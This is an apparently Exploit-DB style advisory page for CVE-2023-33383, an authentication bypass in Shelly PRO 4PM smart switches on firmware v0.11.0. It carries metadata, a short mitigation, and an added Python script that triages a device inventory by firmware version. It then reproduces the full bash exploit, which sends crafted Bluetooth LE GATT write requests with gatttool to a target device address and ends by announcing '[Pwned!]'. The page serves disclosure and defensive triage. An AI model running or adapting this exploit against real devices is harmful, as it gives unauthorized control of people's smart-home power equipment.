Vendor: Shelly PRO 4PM
By: The Security Team
CVSS: 5.3 (MEDIUM)
Authentication Bypass
CWE: 287
Product Name: Shelly PRO 4PM
Affected Version From: Firmware v0.11.0
Affected Version To: Unknown
Patch Exists: NO
Related CVE: CVE-2023-33383
CPE: o:shelly:shelly_pro_4pm_firmware:0.11.0
Metasploit:
Other Scripts:
Platforms Tested: MacOS/Linux
2023

Shelly PRO 4PM v0.11.0 – Authentication Bypass

This exploit allows an attacker to bypass authentication on Shelly PRO 4PM devices running firmware v0.11.0. By sending specific payloads, which the script below delivers as Bluetooth LE GATT write requests using gatttool, the attacker can gain unauthorized access to the device.

Mitigation:

Update the firmware to a version that addresses the authentication bypass vulnerability.
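
Added example (not part of the original advisory or the exploit author's code): a Python triage that checks device-info responses against the version data listed above, so an inventory can be sorted into affected, needs-review and not-applicable devices. It assumes the JSON comes from the device's Shelly.GetDeviceInfo RPC and that a PRO 4PM reports "app": "Pro4PM"; the sample responses and device names are constructed.

```python
import json
import re

AFFECTED_APP = "Pro4PM"      # assumption: "app" value a Shelly PRO 4PM reports
AFFECTED_FROM = (0, 11, 0)   # advisory: affected from firmware v0.11.0, upper bound unknown


def parse_version(ver):
    """Return (major, minor, patch) from strings such as '0.11.0' or 'v0.11.0-beta1'."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", str(ver).strip())
    if not m:
        raise ValueError(f"unrecognised firmware version: {ver!r}")
    return tuple(int(part) for part in m.groups())


def triage(device_info_json):
    """Classify one device-info response against the advisory's version data."""
    info = json.loads(device_info_json)
    if info.get("app") != AFFECTED_APP:
        return "not-applicable"
    try:
        ver = parse_version(info.get("ver", ""))
    except ValueError:
        return "review"            # PRO 4PM with an unreadable version: check by hand
    if ver == AFFECTED_FROM:
        return "affected"
    if ver > AFFECTED_FROM:
        return "review"            # no fixed release is named, so confirm with the vendor
    return "below-listed-range"    # older than the first version the advisory lists


# Constructed sample responses (not captured from real devices).
FLEET = {
    "panel-a": '{"app": "Pro4PM", "ver": "0.11.0", "gen": 2}',
    "panel-b": '{"app": "Pro4PM", "ver": "0.14.1", "gen": 2}',
    "panel-c": '{"app": "Pro4PM", "ver": "0.10.2-beta3", "gen": 2}',
    "plug-d": '{"app": "PlusPlugS", "ver": "0.11.0", "gen": 2}',
    "panel-e": '{"app": "Pro4PM", "gen": 2}',
}


def report(fleet):
    """Map each device name to its triage result."""
    return {name: triage(raw) for name, raw in fleet.items()}


if __name__ == "__main__":
    for name, result in report(FLEET).items():
        print(f"{name}: {result}")
```

Because the advisory lists no fixed release, versions above v0.11.0 are reported as "review" rather than treated as safe.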

Exploit-DB raw data:

#!/bin/bash

# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
# Google Dork: NA
# Date: 2nd August 2023
# Exploit Author: The Security Team [exploitsecurity.io]
# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
# Vendor Homepage: https://www.shelly.com/
# Software Link: NA
# Version: Firmware v0.11.0 (REQUIRED)
# Tested on: MacOS/Linux
# CVE : CVE-2023-33383

IFS=
failed=false
RED="\e[31m"
GREEN="\e[92m"
WHITE="\e[97m"
ENDCOLOR="\e[0m"
substring="Connection refused"


banner()
    {
        clear
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
        echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
        echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
        echo -e "${GREEN}[+]*********************************************************[+]"
        echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
    }

banner
read -s -n 1 key
if [ "$key" = "x" ]; then
    exit 0;
elif [ "$key" = "" ]; then
    gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
    if [ -z "$gattout" ]; then
        echo -e "${RED}Connection timed out${ENDCOLOR}"
        exit 0;
    else
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
    status=$?   # save gatttool's exit status before echo/sleep overwrite $?
    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
    sleep 1
    if [ "$status" -eq 1 ]; then
       failed=true
       exit 0;
    fi
    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
    status=$?   # save gatttool's exit status before sleep overwrites $?
    sleep 1
    if [ "$status" -eq 1 ]; then
        failed=true
        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
        exit 0;
    else
       sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
       sleep 1
       for i in {1..5}
       do
          echo -ne "${GREEN}."
          sleep 1
       done
       echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
    fi
fi
fi